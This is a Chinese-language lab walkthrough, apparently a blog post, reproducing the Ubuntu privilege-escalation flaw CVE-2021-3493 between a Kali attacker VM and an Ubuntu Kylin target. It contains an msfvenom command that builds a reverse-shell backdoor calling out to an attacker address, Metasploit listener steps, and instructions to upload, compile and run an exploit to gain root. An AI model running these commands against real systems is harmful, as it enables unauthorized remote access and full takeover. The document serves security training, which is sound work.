下面复现需要在虚拟机中完成:
CVE-2021-3493漏洞案例
https://github.com/inspiringz/CVE-2021-3493
1、攻击工具及环境说明(在虚拟机上完成)
Ubuntu Kylin(20.04):作为受攻击目标。
![](https://img-blog.csdnimg.cn/ae7cb5fe51b04e6c916c4697c2636d19.png)
Kali Linux(2021):作为攻击者的攻击平台。
![](https://img-blog.csdnimg.cn/87f5976729a5498798e7ba9188e979e2.png)
首先确保两台主机之间的网络连接:确保Ubuntu Kylin和Kali Linux之间可以进行网络通信
2、攻击过程和漏洞利用
在kali上生成后门脚本文件:参考下面命令(IP地址需要更改)
msfvenom -p linux/x84/meterpreter/reverse_tcp LHOST=192.168.153.152 LPORT=4444 -f elf -o shell.elf
![](https://img-blog.csdnimg.cn/4c5964359ee84b3ea87d1d7b6280f60b.png)
上传后门文件到靶机
![](https://img-blog.csdnimg.cn/b451780989404c3dbc4b50fb54f63292.png)
进入kali的msf选择对应的模块:
use exploit/multi/handler
设置set payload为 和linux相关
设置LHOST为靶机的地址
![](https://img-blog.csdnimg.cn/8f432bae82d04e7a847fa9c3f5ae512d.png)
![](https://img-blog.csdnimg.cn/0b85941a73cd40528f4a78a426288d2c.png)
运行:run,同时在靶机上运行上传的后门脚本(.elf文件)
在kali上可以监听到靶机:(如图所示)
![](https://img-blog.csdnimg.cn/26bf71255355458e9698bc4f51268253.png)
上传漏洞利用脚本代码和工具
![](https://img-blog.csdnimg.cn/ae36996425e244428b82c5c6c8aed9ad.png)
进入shell,ls查看靶机目录下的脚本文件,编译脚本
![](https://img-blog.csdnimg.cn/a1a49e088ffc444a9439c25cee01d719.png)
运行编译生成的文件,同时查看用户信息,获得管理员root管理员权限
![](https://img-blog.csdnimg.cn/031c039751a549e8a34a4e552a7f8626.png)